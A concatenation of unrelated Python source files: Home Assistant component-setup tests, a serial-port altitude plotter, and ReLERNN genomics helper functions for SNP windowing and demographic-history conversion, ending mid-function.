    finally:
        if httpd:
            httpd.shutdown()
@contextmanager
def cache_server(return_failed=False, cache_root=None):
    """A context manager which launches a temporary cache server on a random port.

    Yields a TestCacheServer to represent the running server.

    return_failed: False serves files normally, True rejects with 401, and
    "connection-error" aborts every request (see _cache_server_process).
    cache_root: directory to serve from; a temporary dir is used when None.
    """
    queue = Queue()
    # Run the server in a child process so its cwd changes don't leak here.
    process = Process(target=_cache_server_process, args=(queue, return_failed, cache_root))
    process.start()
    try:
        # The child reports the ephemeral port it bound to.
        port = queue.get()
        yield TestCacheServer(f"http://localhost:{port}", cache_root)
    finally:
        process.terminate()
|
test_setup.py | """Test component/platform setup."""
# pylint: disable=protected-access
import asyncio
import os
import threading
from unittest.mock import Mock, patch
import pytest
import voluptuous as vol
from homeassistant import config_entries, setup
import homeassistant.config as config_util
from homeassistant.const import EVENT_COMPONENT_LOADED, EVENT_HOMEASSISTANT_START
from homeassistant.core import callback
from homeassistant.helpers import discovery
from homeassistant.helpers.config_validation import (
PLATFORM_SCHEMA,
PLATFORM_SCHEMA_BASE,
)
import homeassistant.util.dt as dt_util
from tests.common import (
MockConfigEntry,
MockModule,
MockPlatform,
assert_setup_component,
get_test_config_dir,
get_test_home_assistant,
mock_entity_platform,
mock_integration,
)
# Snapshot of the default timezone at import time -- presumably restored by
# tests that mutate dt_util.DEFAULT_TIME_ZONE; usage not visible in this chunk.
ORIG_TIMEZONE = dt_util.DEFAULT_TIME_ZONE
# Path of the config-version file inside the test config directory.
VERSION_PATH = os.path.join(get_test_config_dir(), config_util.VERSION_FILE)
@pytest.fixture(autouse=True)
def mock_handlers():
    """Mock config flows.

    Autouse: registers a minimal ConfigFlow under the "comp" domain for
    every test in this module, so config-entry setup of "comp" can proceed.
    """
    class MockFlowHandler(config_entries.ConfigFlow):
        """Define a mock flow handler."""
        VERSION = 1
    with patch.dict(config_entries.HANDLERS, {"comp": MockFlowHandler}):
        yield
class TestSetup:
    """Test the bootstrap utils."""
    # Per-test HomeAssistant instance, created in setup_method.
    hass = None
    # NOTE(review): backup_cache is never referenced within this class -- confirm
    # against the rest of the module before removing.
    backup_cache = None
    # pylint: disable=invalid-name, no-self-use
    def setup_method(self, method):
        """Set up the test."""
        self.hass = get_test_home_assistant()
    def teardown_method(self, method):
        """Clean up."""
        self.hass.stop()
    def test_validate_component_config(self):
        """Test validating component configuration."""
        config_schema = vol.Schema({"comp_conf": {"hello": str}}, required=True)
        mock_integration(
            self.hass, MockModule("comp_conf", config_schema=config_schema)
        )
        # Missing, None, empty, and extra-key configs must all be rejected.
        with assert_setup_component(0):
            assert not setup.setup_component(self.hass, "comp_conf", {})
        self.hass.data.pop(setup.DATA_SETUP)
        with assert_setup_component(0):
            assert not setup.setup_component(
                self.hass, "comp_conf", {"comp_conf": None}
            )
        self.hass.data.pop(setup.DATA_SETUP)
        with assert_setup_component(0):
            assert not setup.setup_component(self.hass, "comp_conf", {"comp_conf": {}})
        self.hass.data.pop(setup.DATA_SETUP)
        with assert_setup_component(0):
            assert not setup.setup_component(
                self.hass,
                "comp_conf",
                {"comp_conf": {"hello": "world", "invalid": "extra"}},
            )
        self.hass.data.pop(setup.DATA_SETUP)
        with assert_setup_component(1):
            assert setup.setup_component(
                self.hass, "comp_conf", {"comp_conf": {"hello": "world"}}
            )
    def test_validate_platform_config(self, caplog):
        """Test validating platform configuration."""
        platform_schema = PLATFORM_SCHEMA.extend({"hello": str})
        platform_schema_base = PLATFORM_SCHEMA_BASE.extend({})
        mock_integration(
            self.hass,
            MockModule("platform_conf", platform_schema_base=platform_schema_base),
        )
        mock_entity_platform(
            self.hass,
            "platform_conf.whatever",
            MockPlatform(platform_schema=platform_schema),
        )
        with assert_setup_component(0):
            assert setup.setup_component(
                self.hass,
                "platform_conf",
                {"platform_conf": {"platform": "not_existing", "hello": "world"}},
            )
        self.hass.data.pop(setup.DATA_SETUP)
        self.hass.config.components.remove("platform_conf")
        with assert_setup_component(1):
            assert setup.setup_component(
                self.hass,
                "platform_conf",
                {"platform_conf": {"platform": "whatever", "hello": "world"}},
            )
        self.hass.data.pop(setup.DATA_SETUP)
        self.hass.config.components.remove("platform_conf")
        # Platform config may also be given as a list of entries.
        with assert_setup_component(1):
            assert setup.setup_component(
                self.hass,
                "platform_conf",
                {"platform_conf": [{"platform": "whatever", "hello": "world"}]},
            )
        self.hass.data.pop(setup.DATA_SETUP)
        self.hass.config.components.remove("platform_conf")
        # Any falsey platform config will be ignored (None, {}, etc)
        with assert_setup_component(0) as config:
            assert setup.setup_component(
                self.hass, "platform_conf", {"platform_conf": None}
            )
            assert "platform_conf" in self.hass.config.components
            assert not config["platform_conf"] # empty
            assert setup.setup_component(
                self.hass, "platform_conf", {"platform_conf": {}}
            )
            assert "platform_conf" in self.hass.config.components
            assert not config["platform_conf"] # empty
    def test_validate_platform_config_2(self, caplog):
        """Test component PLATFORM_SCHEMA_BASE prio over PLATFORM_SCHEMA."""
        platform_schema = PLATFORM_SCHEMA.extend({"hello": str})
        platform_schema_base = PLATFORM_SCHEMA_BASE.extend({"hello": "world"})
        mock_integration(
            self.hass,
            MockModule(
                "platform_conf",
                platform_schema=platform_schema,
                platform_schema_base=platform_schema_base,
            ),
        )
        mock_entity_platform(
            self.hass,
            "platform_conf.whatever",
            MockPlatform("whatever", platform_schema=platform_schema),
        )
        with assert_setup_component(1):
            assert setup.setup_component(
                self.hass,
                "platform_conf",
                {
                    # pass
                    "platform_conf": {"platform": "whatever", "hello": "world"},
                    # fail: key hello violates component platform_schema_base
                    "platform_conf 2": {"platform": "whatever", "hello": "there"},
                },
            )
    def test_validate_platform_config_3(self, caplog):
        """Test fallback to component PLATFORM_SCHEMA."""
        component_schema = PLATFORM_SCHEMA_BASE.extend({"hello": str})
        platform_schema = PLATFORM_SCHEMA.extend({"cheers": str, "hello": "world"})
        mock_integration(
            self.hass, MockModule("platform_conf", platform_schema=component_schema)
        )
        mock_entity_platform(
            self.hass,
            "platform_conf.whatever",
            MockPlatform("whatever", platform_schema=platform_schema),
        )
        with assert_setup_component(1):
            assert setup.setup_component(
                self.hass,
                "platform_conf",
                {
                    # pass
                    "platform_conf": {"platform": "whatever", "hello": "world"},
                    # fail: key hello violates component platform_schema
                    "platform_conf 2": {"platform": "whatever", "hello": "there"},
                },
            )
    def test_validate_platform_config_4(self):
        """Test entity_namespace in PLATFORM_SCHEMA."""
        component_schema = PLATFORM_SCHEMA_BASE
        platform_schema = PLATFORM_SCHEMA
        mock_integration(
            self.hass,
            MockModule("platform_conf", platform_schema_base=component_schema),
        )
        mock_entity_platform(
            self.hass,
            "platform_conf.whatever",
            MockPlatform(platform_schema=platform_schema),
        )
        with assert_setup_component(1):
            assert setup.setup_component(
                self.hass,
                "platform_conf",
                {
                    "platform_conf": {
                        # pass: entity_namespace accepted by PLATFORM_SCHEMA
                        "platform": "whatever",
                        "entity_namespace": "yummy",
                    }
                },
            )
        self.hass.data.pop(setup.DATA_SETUP)
        self.hass.config.components.remove("platform_conf")
    def test_component_not_found(self):
        """setup_component should not crash if component doesn't exist."""
        assert setup.setup_component(self.hass, "non_existing", {}) is False
    def test_component_not_double_initialized(self):
        """Test we do not set up a component twice."""
        mock_setup = Mock(return_value=True)
        mock_integration(self.hass, MockModule("comp", setup=mock_setup))
        assert setup.setup_component(self.hass, "comp", {})
        assert mock_setup.called
        mock_setup.reset_mock()
        # Second setup of an already-loaded component must be a no-op.
        assert setup.setup_component(self.hass, "comp", {})
        assert not mock_setup.called
    @patch("homeassistant.util.package.install_package", return_value=False)
    def test_component_not_installed_if_requirement_fails(self, mock_install):
        """Component setup should fail if requirement can't install."""
        self.hass.config.skip_pip = False
        mock_integration(self.hass, MockModule("comp", requirements=["package==0.0.1"]))
        assert not setup.setup_component(self.hass, "comp", {})
        assert "comp" not in self.hass.config.components
    def test_component_not_setup_twice_if_loaded_during_other_setup(self):
        """Test component setup while waiting for lock is not set up twice."""
        result = []
        async def async_setup(hass, config):
            """Tracking Setup."""
            result.append(1)
        mock_integration(self.hass, MockModule("comp", async_setup=async_setup))
        def setup_component():
            """Set up the component."""
            setup.setup_component(self.hass, "comp", {})
        # Race two concurrent setups of the same component; the setup
        # callback must run exactly once.
        thread = threading.Thread(target=setup_component)
        thread.start()
        setup.setup_component(self.hass, "comp", {})
        thread.join()
        assert len(result) == 1
    def test_component_not_setup_missing_dependencies(self):
        """Test we do not set up a component if not all dependencies loaded."""
        deps = ["maybe_existing"]
        mock_integration(self.hass, MockModule("comp", dependencies=deps))
        assert not setup.setup_component(self.hass, "comp", {})
        assert "comp" not in self.hass.config.components
        self.hass.data.pop(setup.DATA_SETUP)
        # Once the dependency is registered, setup succeeds.
        mock_integration(self.hass, MockModule("comp2", dependencies=deps))
        mock_integration(self.hass, MockModule("maybe_existing"))
        assert setup.setup_component(self.hass, "comp2", {})
    def test_component_failing_setup(self):
        """Test component that fails setup."""
        mock_integration(
            self.hass, MockModule("comp", setup=lambda hass, config: False)
        )
        assert not setup.setup_component(self.hass, "comp", {})
        assert "comp" not in self.hass.config.components
    def test_component_exception_setup(self):
        """Test component that raises exception during setup."""
        def exception_setup(hass, config):
            """Raise exception."""
            raise Exception("fail!")
        mock_integration(self.hass, MockModule("comp", setup=exception_setup))
        assert not setup.setup_component(self.hass, "comp", {})
        assert "comp" not in self.hass.config.components
    def test_component_setup_with_validation_and_dependency(self):
        """Test all config is passed to dependencies."""
        def config_check_setup(hass, config):
            """Test that config is passed in."""
            if config.get("comp_a", {}).get("valid", False):
                return True
            raise Exception(f"Config not passed in: {config}")
        platform = MockPlatform()
        mock_integration(self.hass, MockModule("comp_a", setup=config_check_setup))
        mock_integration(
            self.hass,
            MockModule("platform_a", setup=config_check_setup, dependencies=["comp_a"]),
        )
        mock_entity_platform(self.hass, "switch.platform_a", platform)
        setup.setup_component(
            self.hass,
            "switch",
            {"comp_a": {"valid": True}, "switch": {"platform": "platform_a"}},
        )
        self.hass.block_till_done()
        assert "comp_a" in self.hass.config.components
    def test_platform_specific_config_validation(self):
        """Test platform that specifies config."""
        platform_schema = PLATFORM_SCHEMA.extend(
            {"valid": True}, extra=vol.PREVENT_EXTRA
        )
        mock_setup = Mock(spec_set=True)
        mock_entity_platform(
            self.hass,
            "switch.platform_a",
            MockPlatform(platform_schema=platform_schema, setup_platform=mock_setup),
        )
        # Invalid platform config: platform is skipped, component still loads.
        with assert_setup_component(0, "switch"):
            assert setup.setup_component(
                self.hass,
                "switch",
                {"switch": {"platform": "platform_a", "invalid": True}},
            )
            self.hass.block_till_done()
            assert mock_setup.call_count == 0
        self.hass.data.pop(setup.DATA_SETUP)
        self.hass.config.components.remove("switch")
        with assert_setup_component(0):
            assert setup.setup_component(
                self.hass,
                "switch",
                {
                    "switch": {
                        "platform": "platform_a",
                        "valid": True,
                        "invalid_extra": True,
                    }
                },
            )
            self.hass.block_till_done()
            assert mock_setup.call_count == 0
        self.hass.data.pop(setup.DATA_SETUP)
        self.hass.config.components.remove("switch")
        with assert_setup_component(1, "switch"):
            assert setup.setup_component(
                self.hass,
                "switch",
                {"switch": {"platform": "platform_a", "valid": True}},
            )
            self.hass.block_till_done()
            assert mock_setup.call_count == 1
    def test_disable_component_if_invalid_return(self):
        """Test disabling component if invalid return."""
        # A setup that returns None (not a bool) counts as failure.
        mock_integration(
            self.hass, MockModule("disabled_component", setup=lambda hass, config: None)
        )
        assert not setup.setup_component(self.hass, "disabled_component", {})
        assert "disabled_component" not in self.hass.config.components
        self.hass.data.pop(setup.DATA_SETUP)
        mock_integration(
            self.hass,
            MockModule("disabled_component", setup=lambda hass, config: False),
        )
        assert not setup.setup_component(self.hass, "disabled_component", {})
        assert "disabled_component" not in self.hass.config.components
        self.hass.data.pop(setup.DATA_SETUP)
        mock_integration(
            self.hass, MockModule("disabled_component", setup=lambda hass, config: True)
        )
        assert setup.setup_component(self.hass, "disabled_component", {})
        assert "disabled_component" in self.hass.config.components
    def test_all_work_done_before_start(self):
        """Test all init work done till start."""
        call_order = []
        async def component1_setup(hass, config):
            """Set up mock component."""
            await discovery.async_discover(
                hass, "test_component2", {}, "test_component2", {}
            )
            await discovery.async_discover(
                hass, "test_component3", {}, "test_component3", {}
            )
            return True
        def component_track_setup(hass, config):
            """Set up mock component."""
            call_order.append(1)
            return True
        mock_integration(
            self.hass, MockModule("test_component1", async_setup=component1_setup)
        )
        mock_integration(
            self.hass, MockModule("test_component2", setup=component_track_setup)
        )
        mock_integration(
            self.hass, MockModule("test_component3", setup=component_track_setup)
        )
        @callback
        def track_start(event):
            """Track start event."""
            call_order.append(2)
        self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START, track_start)
        self.hass.add_job(setup.async_setup_component(self.hass, "test_component1", {}))
        self.hass.block_till_done()
        self.hass.start()
        # Both discovered components set up (1, 1) before the start event (2).
        assert call_order == [1, 1, 2]
async def test_component_warn_slow_setup(hass):
    """Warn we log when a component setup takes a long time."""
    mock_integration(hass, MockModule("test_component1"))
    # Patch call_later so the slow-setup warning timer is captured instead of
    # actually firing.
    with patch.object(hass.loop, "call_later") as mock_call:
        result = await setup.async_setup_component(hass, "test_component1", {})
        assert result
        assert mock_call.called
        assert len(mock_call.mock_calls) == 3
        # First scheduled call is the slow-setup warning.
        timeout, logger_method = mock_call.mock_calls[0][1][:2]
        assert timeout == setup.SLOW_SETUP_WARNING
        assert logger_method == setup._LOGGER.warning
        # The timer must be cancelled once setup completes.
        assert mock_call().cancel.called
async def test_platform_no_warn_slow(hass):
    """Do not warn for long entity setup time."""
    mock_integration(
        hass, MockModule("test_component1", platform_schema=PLATFORM_SCHEMA)
    )
    with patch.object(hass.loop, "call_later") as mock_call:
        result = await setup.async_setup_component(hass, "test_component1", {})
        assert result
        # No warning timer may be scheduled for platform-style components.
        assert len(mock_call.mock_calls) == 0
async def test_platform_error_slow_setup(hass, caplog):
    """Don't block startup more than SLOW_SETUP_MAX_WAIT."""
    # Shrink the timeout so the test completes quickly.
    with patch.object(setup, "SLOW_SETUP_MAX_WAIT", 1):
        called = []
        async def async_setup(*args):
            """Tracking Setup."""
            called.append(1)
            # Sleep past the 1-second max wait to trigger the timeout path.
            await asyncio.sleep(2)
        mock_integration(hass, MockModule("test_component1", async_setup=async_setup))
        result = await setup.async_setup_component(hass, "test_component1", {})
        assert len(called) == 1
        assert not result
        assert "test_component1 is taking longer than 1 seconds" in caplog.text
async def test_when_setup_already_loaded(hass):
    """Test when setup."""
    calls = []
    async def mock_callback(hass, component):
        """Mock callback."""
        calls.append(component)
    # Callback must not fire before the component is loaded.
    setup.async_when_setup(hass, "test", mock_callback)
    await hass.async_block_till_done()
    assert calls == []
    hass.config.components.add("test")
    hass.bus.async_fire(EVENT_COMPONENT_LOADED, {"component": "test"})
    await hass.async_block_till_done()
    assert calls == ["test"]
    # Event listener should be gone
    hass.bus.async_fire(EVENT_COMPONENT_LOADED, {"component": "test"})
    await hass.async_block_till_done()
    assert calls == ["test"]
    # Should be called right away
    setup.async_when_setup(hass, "test", mock_callback)
    await hass.async_block_till_done()
    assert calls == ["test", "test"]
async def test_setup_import_blows_up(hass):
    """Test that we handle it correctly when importing integration blows up."""
    # An exception while importing the component must yield a failed setup,
    # not a crash.
    with patch(
        "homeassistant.loader.Integration.get_component", side_effect=ValueError
    ):
        assert not await setup.async_setup_component(hass, "sun", {})
async def test_parallel_entry_setup(hass):
    """Test config entries are set up in parallel."""
    MockConfigEntry(domain="comp", data={"value": 1}).add_to_hass(hass)
    MockConfigEntry(domain="comp", data={"value": 2}).add_to_hass(hass)
    calls = []
    async def mock_async_setup_entry(hass, entry):
        """Mock setting up an entry."""
        calls.append(entry.data["value"])
        # Yield control so the other entry's setup can interleave.
        await asyncio.sleep(0)
        calls.append(entry.data["value"])
        return True
    mock_integration(
        hass,
        MockModule(
            "comp",
            async_setup_entry=mock_async_setup_entry,
        ),
    )
    mock_entity_platform(hass, "config_flow.comp", None)
    await setup.async_setup_component(hass, "comp", {})
    # Interleaved order [1, 2, 1, 2] proves the two entries ran concurrently.
    assert calls == [1, 2, 1, 2]
async def test_integration_disabled(hass, caplog):
    """Test we can disable an integration."""
    disabled_reason = "Dependency contains code that breaks Home Assistant"
    # A "disabled" key in the manifest must block setup and surface the reason.
    mock_integration(
        hass,
        MockModule("test_component1", partial_manifest={"disabled": disabled_reason}),
    )
    result = await setup.async_setup_component(hass, "test_component1", {})
    assert not result
    assert disabled_reason in caplog.text
async def test_async_get_loaded_integrations(hass):
    """Test we can enumerate loaded integrations."""
    # Dotted platform entries collapse to their integration name; base
    # platforms like switch/device_tracker are reported once.
    hass.config.components.add("notbase")
    hass.config.components.add("switch")
    hass.config.components.add("notbase.switch")
    hass.config.components.add("myintegration")
    hass.config.components.add("device_tracker")
    hass.config.components.add("device_tracker.other")
    hass.config.components.add("myintegration.light")
    assert setup.async_get_loaded_integrations(hass) == {
        "other",
        "switch",
        "notbase",
        "myintegration",
        "device_tracker",
    }
|
altitude_plot.py | #!/usr/bin/env python3
'''
Dependencies: numpy, matplotlib, https://github.com/simondlevy/RealtimePlotter
Copyright (C) 2021 Simon D. Levy
MIT License
'''
import serial
from realtime_plot import RealtimePlotter
import numpy as np
from threading import Thread
from sys import argv, stdout
# Change these to suit your needs
PORT = '/dev/ttyACM0'  # default serial device (overridable via argv[1])
BAUD = 115200          # serial baud rate
NTICKS = 10            # NOTE(review): not referenced in this chunk -- confirm use
class SerialPlotter(RealtimePlotter):
    """Realtime plot of altitude, variometer, and first-difference values
    streamed over a serial port (fed by the _update reader thread)."""
    def __init__(self):
        # Y-axis ranges for the three subplots, in plot order.
        ranges = [(-1,5), (-5,+5), (-5,+5)]
        RealtimePlotter.__init__(self,
                ranges,
                show_yvals=True,
                ylabels=['Altitude', 'Variometer', 'FirstDiff'],
                window_name='Altitude Estimation',
                styles=['b', 'r', 'g'])
        # Incremented by the reader thread for each sample received.
        self.tick = 0
        # Latest sample (list of floats); None until the first line arrives.
        self.vals = None
    def getValues(self):
        # Presumably polled by RealtimePlotter for the current sample -- TODO confirm.
        return self.vals
def _update(port, plotter):
    """Reader loop: forever parse one line of whitespace-separated floats
    from the serial port and publish it to the plotter."""
    while True:
        raw = port.readline().decode()
        # Drop the trailing newline, split on whitespace, convert to floats.
        plotter.vals = list(map(float, raw[:-1].split()))
        plotter.tick += 1
if __name__ == '__main__':
    # Serial device may be overridden on the command line.
    port = argv[1] if len(argv) > 1 else PORT
    try:
        port = serial.Serial(port, BAUD)
    except serial.SerialException:
        # Report the port we actually tried (may be the argv override),
        # not the hard-coded default PORT.
        print('Unable to open device on port %s' % port)
        exit(1)
    plotter = SerialPlotter()
    # Daemon thread: dies automatically when the plotting loop exits.
    thread = Thread(target=_update, args = (port, plotter))
    thread.daemon = True
    thread.start()
    plotter.start()
|
helpers.py |
'''
Authors: Jared Galloway, Jeff Adrion
'''
from ReLERNN.imports import *
#-------------------------------------------------------------------------------------------
def assign_task(mpID, task_q, nProcs):
    """Partition mpID into nProcs contiguous chunks (sizes differing by at
    most one) and put each chunk on task_q tagged with a 1-based job number."""
    base = len(mpID) // nProcs                # minimum chunk size
    n_small = nProcs - (len(mpID) % nProcs)   # number of chunks at the base size
    cursor, job = 0, 1
    for k in range(nProcs):
        # The first n_small chunks take `base` items, the rest take one extra.
        size = base if k < n_small else base + 1
        task_q.put((mpID[cursor:cursor + size], job))
        cursor += size
        job += 1
#-------------------------------------------------------------------------------------------
def create_procs(nProcs, task_q, result_q, params, worker):
    """Spawn nProcs daemon worker processes running `worker(task_q, result_q,
    params)` and return their Process handles."""
    def _spawn():
        proc = mp.Process(target=worker, args=(task_q, result_q, params))
        # Daemon: workers must not outlive the parent process.
        proc.daemon = True
        proc.start()
        return proc
    return [_spawn() for _ in range(nProcs)]
#-------------------------------------------------------------------------------------------
def get_corrected_index(L, N):
    """Return [index, value] of the element of L closest to N.

    Ties keep the earliest element; an empty L yields ["", ""].
    """
    best_idx, best_val = "", ""
    best_dist = float("inf")
    for j, candidate in enumerate(L):
        gap = abs(N - candidate)
        # Strict < keeps the first of equally-close candidates.
        if gap < best_dist:
            best_idx, best_val, best_dist = j, candidate, gap
    return [best_idx, best_val]
#-------------------------------------------------------------------------------------------
def get_corrected(rate, bs):
    """Map a raw rate onto its bootstrap-corrected rate and 95% CI bounds,
    using the bootstrap row whose Q2 value is nearest to `rate`.

    Returns [corrected_rate, ci_low, ci_high], each clamped at zero via relu.
    """
    row, nearest = get_corrected_index(bs["Q2"], rate)
    lo = bs["CI95LO"][row]
    hi = bs["CI95HI"][row]
    corrected = relu(rate + (bs["rho"][row] - nearest))
    ci_low = relu(corrected + (lo - nearest))
    ci_high = relu(corrected + (hi - nearest))
    return [corrected, ci_low, ci_high]
#-------------------------------------------------------------------------------------------
def get_index(pos, winSize):
    """Return [start, stop) index pairs delimiting each window's SNPs in pos."""
    counts = snps_per_win(pos, winSize)
    bounds = []
    start = 0
    for count in counts:
        bounds.append([start, start + count])
        start += count
    return bounds
#-------------------------------------------------------------------------------------------
def snps_per_win(pos, window_size):
    """Count SNPs in non-overlapping windows along the chromosome.

    Bin edges start at 1 (1-based coordinates, per the VCF standard) and run
    in steps of window_size past the last position.
    """
    edges = np.arange(1, pos.max() + window_size, window_size)
    counts, _ = np.histogram(pos, bins=edges)
    return counts
#-------------------------------------------------------------------------------------------
def find_win_size(winSize, pos, winSizeMx):
    """Probe a window size against the target max-SNPs-per-window.

    Returns [-1] when the busiest window exceeds winSizeMx, [1] when it falls
    short, and [winSize, min, mean(int), max, nWindows] when it matches.
    """
    counts = snps_per_win(pos, winSize)
    lo, avg, hi = counts.min(), int(counts.mean()), counts.max()
    if hi > winSizeMx:
        return [-1]
    if hi < winSizeMx:
        return [1]
    return [winSize, lo, avg, hi, len(counts)]
#-------------------------------------------------------------------------------------------
def force_win_size(winSize, pos):
    """Return [winSize, min, mean(int), max, nWindows] of per-window SNP
    counts for the given window size, without any target check."""
    counts = snps_per_win(pos, winSize)
    return [winSize, counts.min(), int(counts.mean()), counts.max(), len(counts)]
#-------------------------------------------------------------------------------------------
def maskStats(wins, last_win, mask, maxLen):
    """
    return a three-element list with the first element being the total proportion of the window that is masked,
    the second element being a list of masked positions that are relative to the window start=0 and the window end = window length,
    and the third being the last window before breaking to expedite the next loop
    """
    # wins = [chrom:span-string, window start, window length].
    chrom = wins[0].split(":")[0]
    a = wins[1]
    L = wins[2]
    b = a + L
    prop = [0.0,[],0]
    try:
        # Mask intervals for this chrom are assumed sorted; last_win lets the
        # caller resume where the previous window's scan left off.
        for i in range(last_win, len(mask[chrom])):
            x, y = mask[chrom][i][0], mask[chrom][i][1]
            if y < a:
                # Mask interval lies entirely before the window: skip ahead.
                continue
            if b < x:
                # Mask interval starts past the window: nothing more overlaps.
                return prop
            else: # i.e. [a--b] and [x--y] overlap
                if a >= x and b <= y:
                    # Window fully contained in the mask.
                    return [1.0, [[0,maxLen]], i]
                elif a >= x and b > y:
                    # Mask covers the left edge of the window.
                    win_prop = (y-a)/float(b-a)
                    prop[0] += win_prop
                    prop[1].append([0,int(win_prop * maxLen)])
                    prop[2] = i
                elif b <= y and a < x:
                    # Mask covers the right edge of the window.
                    win_prop = (b-x)/float(b-a)
                    prop[0] += win_prop
                    prop[1].append([int((1-win_prop)*maxLen),maxLen])
                    prop[2] = i
                else:
                    # Mask interval strictly inside the window.
                    win_prop = (y-x)/float(b-a)
                    prop[0] += win_prop
                    prop[1].append([int(((x-a)/float(b-a))*maxLen), int(((y-a)/float(b-a))*maxLen)])
                    prop[2] = i
        return prop
    except KeyError:
        # No mask entries for this chromosome: window is unmasked.
        return prop
#-------------------------------------------------------------------------------------------
def check_demHist(path):
    """Sniff the demographic-history file format from its leading lines.

    Returns 1 for stairwayplot output ("mutation_per_site" header), 2 for
    smc++ ("label" header), 3 for MSMC ("time_index" header), or -9 when no
    known header is found.
    """
    markers = (("mutation_per_site", 1), ("label", 2), ("time_index", 3))
    with open(path, "r") as fIN:
        for line in fIN:
            for prefix, flag in markers:
                if line.startswith(prefix):
                    return flag
    return -9
#-------------------------------------------------------------------------------------------
def convert_msmc_output(results_file, mutation_rate, generation_time):
    """
    This function converts the output from msmc into a csv the will be read in for
    plotting comparison.

    MSMC outputs times and rates scaled by the mutation rate per basepair per generation.
    First, scaled times are given in units of the per-generation mutation rate.
    This means that in order to convert scaled times to generations,
    divide them by the mutation rate. In humans, we used mu=1e-8 per basepair per generation.
    To convert generations into years, multiply by the generation time, for which we used 10 years.
    To get population sizes out of coalescence rates, first take the inverse of the coalescence rate,
    scaledPopSize = 1 / lambda00. Then divide this scaled population size by 2*mu

    Writes <results_file>.csv with a "label,x,y" header and one
    "pop0,<years>,<size>" row per msmc line. Returns None.
    """
    outfile = results_file + ".csv"
    # Context managers guarantee both handles are closed; the original called
    # `out_fp.close` without parentheses, which never actually closed the file.
    with open(results_file, "r") as in_fp, open(outfile, "w") as out_fp:
        in_fp.readline()  # skip the msmc header row
        out_fp.write("label,x,y\n")
        for line in in_fp:
            result = line.split()
            # Column 1: scaled time; column 3: coalescence rate (lambda00).
            time = float(result[1])
            time_generation = time / mutation_rate
            time_years = time_generation * generation_time
            lambda00 = float(result[3])
            scaled_pop_size = 1 / lambda00
            size = scaled_pop_size / (2 * mutation_rate)
            out_fp.write(f"pop0,{time_years},{size}\n")
    return None
#-------------------------------------------------------------------------------------------
def convert_demHist(path, nSamps, gen, fType, mu):
    """Convert a demographic-history file into msprime simulation inputs.

    path: history file; fType: format flag from check_demHist (1=stairwayplot,
    2=smc++, 3=MSMC); nSamps: sample size; gen: generation time in years;
    mu: per-bp per-generation mutation rate (used only for MSMC conversion).

    Returns a dict with "population_configurations", "migration_matrix"
    (None), and "demographic_events" keyword arguments for msprime.
    """
    swp, PC, DE = [],[],[]
    # Convert stairwayplot to msp demographic_events
    if fType == 1:
        with open(path, "r") as fIN:
            flag=0
            lCt=0
            for line in fIN:
                if flag == 1:
                    # Keep every other data line after the header.
                    if lCt % 2 == 0:
                        swp.append(line.split())
                    lCt+=1
                if line.startswith("mutation_per_site"):
                    flag=1
        # Column 5 = time in years, column 6 = population size.
        N0 = int(float(swp[0][6]))
        for i in range(len(swp)):
            if i == 0:
                PC.append(msp.PopulationConfiguration(sample_size=nSamps, initial_size=N0))
            else:
                DE.append(msp.PopulationParametersChange(time=int(float(swp[i][5])/float(gen)), initial_size=int(float(swp[i][6])), population=0))
    ## Convert MSMC to similar format to smc++
    if fType == 3:
        convert_msmc_output(path, mu, gen)
        path+=".csv"
    ## Convert smc++ or MSMC results to msp demographic_events
    if fType == 2 or fType == 3:
        with open(path, "r") as fIN:
            fIN.readline()
            for line in fIN:
                ar=line.split(",")
                # [time in generations, population size]
                swp.append([int(float(ar[1])/gen),int(float(ar[2]))])
        N0 = swp[0][1]
        for i in range(len(swp)):
            if i == 0:
                PC.append(msp.PopulationConfiguration(sample_size=nSamps, initial_size=N0))
            else:
                DE.append(msp.PopulationParametersChange(time=swp[i][0], initial_size=swp[i][1], population=0))
    dd=msp.DemographyDebugger(population_configurations=PC,
            demographic_events=DE)
    print("Simulating under the following population size history:")
    dd.print_history()
    MspD = {"population_configurations" : PC,
            "migration_matrix" : None,
            "demographic_events" : DE}
    # NOTE(review): MspD is always a non-empty dict here, so the else branch
    # below is unreachable -- confirm intent before simplifying.
    if MspD:
        return MspD
    else:
        print("Error in converting demographic history file.")
        sys.exit(1)
#-------------------------------------------------------------------------------------------
def relu(x):
    """Rectifier: return x clamped below at zero."""
    return x if x > 0 else 0
#-------------------------------------------------------------------------------------------
def zscoreTargets(self):
    """Z-score-normalize a copy of the training targets.

    NOTE(review): the normalized array `nTargets` is neither returned nor
    stored back on `self`, so as written the result is discarded -- confirm
    whether this should return nTargets or assign it to self.
    """
    norm = self.targetNormalization
    # Work on a deep copy so the stored targets are untouched.
    nTargets = copy.deepcopy(self.infoDir['y'])
    if(norm == 'zscore'):
        tar_mean = np.mean(nTargets,axis=0)
        tar_sd = np.std(nTargets,axis=0)
        nTargets -= tar_mean
        # where= guards against division by zero for constant columns.
        nTargets = np.divide(nTargets,tar_sd,out=np.zeros_like(nTargets),where=tar_sd!=0)
#-------------------------------------------------------------------------------------------
def load_and_predictVCF(VCFGenerator,
            resultsFile=None,
            network=None,
            chromStr=None,
            minS = 50,
            numWins = None,
            batchSize = None,
            gpuID = 0,
            hotspots = False):
    """Load a pretrained network and write per-window recombination-rate
    predictions for a VCF to a tab-separated results file.

    network: [json_architecture_path, weights_path]; chromStr: "chrom:start-end"
    string used to clip the final window; minS: minimum SNPs for a window to
    be reported. Predictions are de-normalized with the mean/sd of the
    generator's "rho" info and clamped at zero via relu.
    """
    if hotspots:
        print("Error: hotspot detection under construction")
        sys.exit(1)
    # Pin computation to the requested GPU.
    os.environ["CUDA_VISIBLE_DEVICES"] = str(gpuID)
    ## The following code block appears necessary for running with tf2 and cudnn
    from tensorflow.compat.v1 import ConfigProto
    from tensorflow.compat.v1 import Session
    config = ConfigProto()
    config.gpu_options.allow_growth = True
    Session(config=config)
    ###
    # load json and create model
    if(network != None):
        jsonFILE = open(network[0],"r")
        loadedModel = jsonFILE.read()
        jsonFILE.close()
        model=model_from_json(loadedModel)
        model.load_weights(network[1])
    else:
        print("Error: no pretrained network found!")
        sys.exit(1)
    num_batches = int(np.ceil(numWins / batchSize))
    with open(resultsFile, "w") as fOUT:
        ct=0
        # End coordinate of the chromosome, parsed from "chrom:start-end".
        last = int(chromStr.split(":")[-1].split("-")[-1])
        fOUT.write("\t".join([str(head) for head in ["chrom","start","end","nSites","recombRate"]])+"\n")
        for i in range(num_batches):
            X,chrom,win,info,nSNPs = VCFGenerator.__getitem__(i)
            predictions = model.predict(X)
